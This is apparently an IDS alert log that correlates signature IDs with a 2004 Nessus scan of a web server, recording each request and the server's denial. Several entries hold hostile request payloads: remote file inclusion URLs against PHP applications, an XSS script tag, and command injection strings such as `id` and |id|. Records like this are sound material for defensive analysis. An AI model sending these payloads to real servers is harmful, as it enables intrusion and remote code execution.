2143 | Nessus 11667 | web-application-attack | WEB-PHP b2 cafelog gm-2-b2.php remote command execution attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:43:46 2004] "GET /cgi-bin/b2-tools/gm-2-b2.php?b2inc=http://xxxxxxxx HTTP/1.1" 403 312 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/b2-tools ---------------------------------------- GET /cgi-bin/b2-tools/gm-2-b2.php?b2inc=http://xxxxxxxx HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2147 | BID7677 Nessus 11647 | web-application-attack | WEB-PHP BLNews objects.inc.php4 remote command execution attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:45:31 2004] "GET /cgi-bin/admin/objects.inc.php4?Server[path]=http://xxxxxx&Server[language_file]=nessus.php HTTP/1.1" 403 314 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/admin ---------------------------------------- GET /cgi-bin/admin/objects.inc.php4?Server[path]=http://xxxxxx&Server[language_file]=nessus.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2149 | Nessus 11646 | web-application-activity | WEB-PHP Turba status.php access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:53 2004] "GET /cgi-bin/turba/status.php HTTP/1.1" 403 308 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/turba ---------------------------------------- GET /cgi-bin/turba/status.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2150 | BID7625 BID7543 BID7542 Nessus 11636 | web-application-attack | WEB-PHP ttCMS header.php remote command execution attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:42:59 2004] "GET /cgi-bin/admin/templates/header.php?admin_root=http://xxxxxxxx. HTTP/1.1" 403 318 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/admin ---------------------------------------- GET /cgi-bin/admin/templates/header.php?admin_root=http://xxxxxxxx. HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Cookie: ttcms_user_admin=1 Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2152 | Nessus 11617 | web-application-activity | WEB-PHP test.php access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:00 2004] "GET /imp/test.php HTTP/1.1" 403 296 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/imp ---------------------------------------- GET /imp/test.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2155 | BID7542 BID7543 Nessus 11615 | web-application-attack | WEB-PHP ttforum remote command execution attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:40:03 2004] "GET /modules/forum/index.php?board=10;action=news;ext=help;template=http://xxxxxxxxxxxx HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/modules/forum/index.php] for 50000 ms ---------------------------------------- GET /modules/forum/index.php?board=10;action=news;ext=help;template=http://xxxxxxxxxxxx HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "template=http" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2156 | Nessus 11685 | web-application-activity | WEB-MISC mod_gzip_status access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:45 2004] "GET /mod_gzip_status HTTP/1.1" 404 295 Handler: (null) Error: mod_security: Warning. Pattern match "/mod_gzip_status" at THE_REQUEST. ---------------------------------------- GET /mod_gzip_status HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/mod_gzip_status" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2194 | Nessus 11748 CAN-2002-0749 | web-application-activity | WEB-CGI CSMailto.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:44:30 2004] "GET /cgi-bin/CSMailto.cgi HTTP/1.1" 404 300 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/CSMailto.cgi ---------------------------------------- GET /cgi-bin/CSMailto.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2195 | Nessus 11748 CAN-2002-0346 | web-application-activity | WEB-CGI alert.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:06 2004] "GET /cgi-bin/alert.cgi HTTP/1.1" 404 297 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/alert.cgi ---------------------------------------- GET /cgi-bin/alert.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2198 | Nessus 11748 CAN-2003-0153 | web-application-activity | WEB-CGI cvslog.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:17 2004] "GET /cgi-bin/cvslog.cgi?file=<SCRIPT>window.alert</SCRIPT> HTTP/1.1" 403 302 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/cvslog.cgi ---------------------------------------- GET /cgi-bin/cvslog.cgi?file=<SCRIPT>window.alert</SCRIPT> HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2199 | Nessus 11748 CAN-2003-0153 | web-application-activity | WEB-CGI multidiff.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:35 2004] "GET /cgi-bin/multidiff.cgi HTTP/1.1" 403 305 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/multidiff.cgi ---------------------------------------- GET /cgi-bin/multidiff.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=87 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2200 | Nessus 11748 CAN-2000-0423 | web-application-activity | WEB-CGI dnewsweb.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:35 2004] "GET /cgi-bin/dnewsweb.cgi HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/dnewsweb.cgi ---------------------------------------- GET /cgi-bin/dnewsweb.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=85 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2201 | Nessus 11748 CAN-1999-1377 | web-application-activity | WEB-CGI download.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:35 2004] "GET /cgi-bin/download.cgi HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/download.cgi ---------------------------------------- GET /cgi-bin/download.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=83 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2202 | Nessus 11748 CAN-2001-1196 | web-application-activity | WEB-CGI edit_action.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:35 2004] "GET /cgi-bin/edit_action.cgi HTTP/1.1" 403 307 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/edit_action.cgi ---------------------------------------- GET /cgi-bin/edit_action.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=81 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2203 | Nessus 11748 CAN-2001-0023 | web-application-activity | WEB-CGI everythingform.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:36 2004] "GET /cgi-bin/everythingform.cgi HTTP/1.1" 403 310 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/everythingform.cgi ---------------------------------------- GET /cgi-bin/everythingform.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=77 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2204 | Nessus 11748 CAN-2002-0263 | web-application-activity | WEB-CGI ezadmin.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:36 2004] "GET /cgi-bin/ezadmin.cgi HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/ezadmin.cgi ---------------------------------------- GET /cgi-bin/ezadmin.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=75 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2205 | Nessus 11748 CAN-2002-0263 | web-application-activity | WEB-CGI ezboard.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:36 2004] "GET /cgi-bin/ezboard.cgi HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/ezboard.cgi ---------------------------------------- GET /cgi-bin/ezboard.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=73 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2206 | Nessus 11748 CAN-2002-0263 | web-application-activity | WEB-CGI ezman.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:37 2004] "GET /cgi-bin/ezman.cgi HTTP/1.1" 403 301 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/ezman.cgi ---------------------------------------- GET /cgi-bin/ezman.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=71 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2207 | Nessus 11748 CAN-2002-0611 | web-application-activity | WEB-CGI fileseek.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:37 2004] "GET /cgi-bin/FileSeek.cgi HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/FileSeek.cgi ---------------------------------------- GET /cgi-bin/FileSeek.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=67 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2208 | Nessus 11748 CAN-2002-0230 | web-application-activity | WEB-CGI fom.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:37 2004] "GET /cgi-bin/fom.cgi HTTP/1.1" 403 299 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/fom.cgi ---------------------------------------- GET /cgi-bin/fom.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=65 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2209 | Nessus 11748 CAN-2000-0288 | web-application-activity | WEB-CGI getdoc.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:38 2004] "GET /cgi-bin/getdoc.cgi HTTP/1.1" 403 302 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/getdoc.cgi ---------------------------------------- GET /cgi-bin/getdoc.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=61 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2210 | Nessus 11748 CVE-2000-0952 | web-application-activity | WEB-CGI global.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:38 2004] "GET /cgi-bin/global.cgi HTTP/1.1" 403 302 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/global.cgi ---------------------------------------- GET /cgi-bin/global.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=59 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2211 | Nessus 11748 CAN-2001-0180 | web-application-activity | WEB-CGI guestserver.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:38 2004] "GET /cgi-bin/guestserver.cgi HTTP/1.1" 403 307 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/guestserver.cgi ---------------------------------------- GET /cgi-bin/guestserver.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=57 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2212 | Nessus 11748 CAN-2002-1334 | web-application-activity | WEB-CGI imageFolio.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:39 2004] "GET /cgi-bin/imageFolio.cgi HTTP/1.1" 403 306 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/imageFolio.cgi ---------------------------------------- GET /cgi-bin/imageFolio.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=55 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2213 | Nessus 11748 CVE-2000-0977 | web-application-activity | WEB-CGI mailfile.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:39 2004] "GET /cgi-bin/mailfile.cgi HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/mailfile.cgi ---------------------------------------- GET /cgi-bin/mailfile.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=51 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2214 | Nessus 11748 CAN-2000-0526 | web-application-activity | WEB-CGI mailview.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:39 2004] "GET /cgi-bin/mailview.cgi HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/mailview.cgi ---------------------------------------- GET /cgi-bin/mailview.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=49 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2215 | Nessus 11748 CAN-2000-1023 | web-application-activity | WEB-CGI nsManager.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:40 2004] "GET /cgi-bin/nsManager.cgi HTTP/1.1" 403 305 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/nsManager.cgi ---------------------------------------- GET /cgi-bin/nsManager.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=45 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2216 | Nessus 11748 CAN-2001-1283 | web-application-activity | WEB-CGI readmail.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:40 2004] "GET /cgi-bin/readmail.cgi HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/readmail.cgi ---------------------------------------- GET /cgi-bin/readmail.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=41 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2217 | Nessus 11748 CAN-2001-1283 | web-application-activity | WEB-CGI printmail.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:41 2004] "GET /cgi-bin/printmail.cgi HTTP/1.1" 403 305 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/printmail.cgi ---------------------------------------- GET /cgi-bin/printmail.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=39 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2218 | Nessus 11748 CAN-2002-0346 | web-application-activity | WEB-CGI service.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:42 2004] "GET /cgi-bin/service.cgi HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/service.cgi ---------------------------------------- GET /cgi-bin/service.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=31 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2219 | Nessus 11748 CAN-2001-0133 | web-application-activity | WEB-CGI setpasswd.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:42 2004] "GET /cgi-bin/setpasswd.cgi HTTP/1.1" 403 305 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/setpasswd.cgi ---------------------------------------- GET /cgi-bin/setpasswd.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=29 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2220 | Nessus 11748 CAN-2001-0022 | web-application-activity | WEB-CGI simplestmail.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:42 2004] "GET /cgi-bin/simplestmail.cgi HTTP/1.1" 403 308 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/simplestmail.cgi ---------------------------------------- GET /cgi-bin/simplestmail.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=27 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2221 | Nessus 11748 CAN-2001-1343 | web-application-activity | WEB-CGI ws_mail.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:43 2004] "GET /cgi-bin/ws_mail.cgi HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/ws_mail.cgi ---------------------------------------- GET /cgi-bin/ws_mail.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=19 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2222 | Nessus 11740 BID7912 BID7911 BID7910 | web-application-activity | WEB-CGI nph-exploitscanget.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:44:06 2004] "GET /cgi-bin/nph-exploitscanget.cgi?host=`id`&port=80&errchk=0&idsbypass=0 HTTP/1.1" 404 310 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/nph-exploitscanget.cgi ---------------------------------------- GET /cgi-bin/nph-exploitscanget.cgi?host=`id`&port=80&errchk=0&idsbypass=0 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2223 | CVE-2002-0923 BID4994 | web-application-activity | WEB-CGI csNews.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:42:53 2004] "GET /cgi-bin/csNews.cgi HTTP/1.1" 403 302 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/csNews.cgi ---------------------------------------- GET /cgi-bin/csNews.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2224 | Nessus 11750 BID6607 | web-application-activity | WEB-CGI psunami.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:31 2004] "GET /shop/psunami.cgi?file=\|id\| HTTP/1.1" 404 296 Handler: (null) Error: File does not exist: /usr/local/apache/htdocs/shop/psunami.cgi ---------------------------------------- GET /shop/psunami.cgi?file=\|id\| HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
